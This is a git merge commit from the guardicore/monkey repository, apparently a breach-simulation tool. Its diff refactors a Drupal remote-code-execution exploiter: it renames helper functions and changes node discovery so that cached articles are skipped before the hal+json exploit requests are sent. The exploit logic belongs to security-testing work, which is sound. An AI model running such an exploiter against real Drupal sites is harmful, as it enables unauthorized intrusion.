Merge branch '669/drupal' of https://github.com/guardicore/monkey into 669/drupal

This commit is contained in:
Shay Nehmad 2020-09-01 12:17:33 +03:00
commit 5a00d5e5f9
1 changed file with 14 additions and 15 deletions

View File

@@ -45,7 +45,7 @@ class DrupalExploiter(WebRCE):
:return: None (in-place addition) :return: None (in-place addition)
""" """
for url in potential_urls: for url in potential_urls:
node_ids = find_articles(url) node_ids = find_exploitbale_article_ids(url)
if node_ids is None: if node_ids is None:
LOG.info('Could not find a Drupal node to attack') LOG.info('Could not find a Drupal node to attack')
continue continue
@@ -73,7 +73,7 @@ class DrupalExploiter(WebRCE):
json=payload, json=payload,
headers={"Content-Type": "application/hal+json"}) headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(response): if is_response_cached(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
return False return False
@@ -89,7 +89,7 @@ class DrupalExploiter(WebRCE):
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(r): if is_response_cached(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed') LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
if ID_STRING not in r.text: if ID_STRING not in r.text:
@@ -108,23 +108,22 @@ class DrupalExploiter(WebRCE):
return self.vulnerable_urls.pop() return self.vulnerable_urls.pop()
def check_drupal_cache(r: requests.Response) -> bool: def is_response_cached(r: requests.Response) -> bool:
""" """ Check if a response had the cache header. """
Check if a response had the cache header.
"""
return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT' return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
def find_articles(base_url: str, lower: int = 1, upper: int = 10): def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 10) -> set:
""" Find a target article that does not 404 and is not cached """ """ Find target articles that do not 404 and are not cached """
articles = set() articles = set()
while lower < upper: while lower < upper:
u = urljoin(base_url, str(lower)) node_url = urljoin(base_url, str(lower))
r = requests.get(u) response = requests.get(node_url)
if r.status_code == 200: # found an article if response.status_code == 200:
articles.add(lower) if is_response_cached(response):
if check_drupal_cache(r): LOG.info(f'Found a cached article at: {node_url}, skipping')
LOG.info(f'Found a cached article at: {lower}, skipping') else:
articles.add(lower)
lower += 1 lower += 1
return articles return articles